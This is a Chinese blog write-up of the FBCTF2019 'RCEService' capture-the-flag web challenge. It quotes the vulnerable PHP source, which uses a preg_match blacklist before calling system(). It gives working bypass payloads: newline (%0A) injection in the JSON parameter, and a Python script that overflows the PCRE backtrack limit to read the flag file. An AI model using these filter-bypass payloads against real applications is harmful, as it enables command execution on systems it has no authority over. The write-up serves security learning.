[FBCTF2019]RCEService

最新推荐文章于 2024-07-15 23:44:59 发布
最新推荐文章于 2024-07-15 23:44:59 发布
阅读量2k 收藏 3
点赞数 2
分类专栏: CTF刷题记录 文章标签: web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/119306689
版权

知识点:PHP利用PCRE回溯次数限制绕过某些安全限制,多行绕过preg_match函数

文章目录

解题过程

打开容器,题目显示需要以json的形式进行输入
在这里插入图片描述在先知上有题目源码:Facebook CTF 2019 - Web

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

审计之后,发现很多的函数都被禁止了。尝试一下json格式

{"cmd":"ls"}

在这里插入图片描述

第一种解法

因为preg_match只能匹配第一行,所以这里可以采用多行绕过。
因为putenv('PATH=/home/rceservice/jail');修改了环境变量,所以只能使用绝对路径使用cat命令,cat命令在/bin文件夹下
在这里插入图片描述

首先查看该目录下文件

?cmd={%0A"cmd":"ls /home/rceservice"%0A}

在这里插入图片描述而后cat命令读取文件内容,payload:

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

在这里插入图片描述

第二种解法

关于preg_match,有p神曾经讲的PRCE,但是这个题目复习环境是gat传参,而非post,会导致414报错,记录一下原题wp:

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

参考链接

  1. Facebook CTF 2019 - Web
  2. p神:PHP利用PCRE回溯次数限制绕过某些安全限制
Sk1y
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
BUUCTF [FBCTF2019]go_get_the_flag
weixin_53349587的博客
12-10 938
1.拿到文件,查壳: E ELF文件,64位。 不难发现这个文件相比正常文件要大的多,猜测是用go语言写的。 2.IDA打开,找到函数部分: 全是未知函数。 同时运行程序后搜索关键字符串,结果是一堆特别长的字符串,分析了半天,什么也没分析出来。。。 这种情况下,需要进行go语言去符号化。 3.去符号化之后,重新查看函数: 函数正常多了,我们找到main_main函数: 也没有什么线索。 此时注意到main_main函数下面有一个main_checkpassword...
[FBCTF2019]RCEService 正则回溯
qq_54929891的博客
03-28 568
打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $jso..
[FBCTF2019]RCEService 1
最新发布
ubaichu的博客
07-15 544
[FBCTF2019]RCEService 1 题目详细解析
[ctf web][FBCTF2019]RCEService writeup + preg_match()绕过
ShenZ的博客
08-20 2431
[FBCTF2019]RCEService 知识点: preg_match(): 1.%0a换行绕过 2.正则(pcre)最大回溯绕过 putenv()函数 Setting an environment variable preg_match()绕过: 1.正则(pcre)最大回溯/递归限制 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%0a换行绕过 其实是正则书写不当 (1).不会匹配换行符 (2)非多行模式 putenv()函数:
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-05
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
开源的CTF比赛平台有那些
03-25
1. CTFd (https://github.com/CTFd/CTFd) 2. PicoCTF platform (https://github.com/picoCTF/picoCTF-platform) 3. FBCTF (https://github.com/facebook/fbctf) 4. RootTheBox (https://github.com/moloch--/RootTheBox) 5. HackTheBox platform (https://github.com/HackTheBox/htb-frontend) 6. Metasploitable 3 CTF platform (https://github.com/rapid7/metasploitable3_ctf) 7. Securinets CTF platform (https://github.com/Securinets/Securinets-CTF-Platform) 8. Vagrant CTF (https://github.com/fiteagle/vagrant-ctf) 9. CyberChef CTF platform (https://github.com/TobiasSchoch/cyberchef-ctf) 10. Hackazon (https://github.com/rapid7/hackazon)
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值